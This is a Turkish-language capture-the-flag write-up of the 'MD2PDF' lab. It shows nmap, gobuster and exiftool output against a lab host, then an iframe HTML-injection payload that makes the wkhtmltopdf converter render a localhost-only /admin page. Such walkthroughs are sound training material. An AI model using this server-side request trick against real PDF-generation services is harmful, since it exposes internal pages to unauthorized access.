Post

MD2PDF

“TopTierConversions LTD, en yeni ve en harika ürün lansmanını duyurmaktan gurur duyar: MD2PDF.

Bu kullanımı kolay yardımcı program, markdown dosyalarını PDF’e dönüştürür ve tamamen güvenlidir!”

MD2PDF


nmap :

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~]
└─# nmap -T4 -sV 10.10.39.156    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-04 07:03 UTC
WARNING: Service 10.10.39.156:5000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
WARNING: Service 10.10.39.156:80 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
Nmap scan report for 10.10.39.156 (10.10.39.156)
Host is up (0.081s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open  rtsp
5000/tcp open  rtsp

80 portunda web servisi çalışıyor. Siteyi ziyaret edelim.

5000 portu:

İki sitede dizin taraması yaptım. İkisinde de /admin dizini var ve erişimimiz yok.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[~]
└─# gobuster dir --wordlist=/usr/share/wordlists/dirb/big.txt --url http://10.10.39.156 -t 40
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.39.156
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 403) [Size: 166]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[~]
└─# gobuster dir --wordlist=/usr/share/wordlists/dirb/big.txt --url http://10.10.39.156:5000 -t 40
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.39.156:5000
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 403) [Size: 166]

Dizine sadece localhosttan erişilebiliyor.

Siteye geri dönelim. Deneme amaçlı bir PDF oluşturuyorum.

PDF dosyasını indirip exiftool ile inceledim.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~/Desktop]
└─# exiftool document.pdf                                        
ExifTool Version Number         : 12.76
File Name                       : document.pdf
Directory                       : .
File Size                       : 7.7 kB
File Modification Date/Time     : 2024:05:04 07:18:50+00:00
File Access Date/Time           : 2024:05:04 07:18:50+00:00
File Inode Change Date/Time     : 2024:05:04 07:18:50+00:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Title                           : 
Creator                         : wkhtmltopdf 0.12.5
Producer                        : Qt 4.8.7
Create Date                     : 2024:05:04 07:18:12Z
Page Count                      : 1

Creator bilgilerinde bu web sitesinin HTML’i PDF’e dönüştürdüğünü görüyoruz. HTML Injection saldırısı deneyebiliriz. /admin dizinine erişimimiz yoktu. <iframe src="http://localhost:5000/admin"></iframe> payloadı ile dizine gitmeye çalıştım.

Ve sayfanın içeriğini görüntüledim.

This post is licensed under CC BY 4.0 by the author.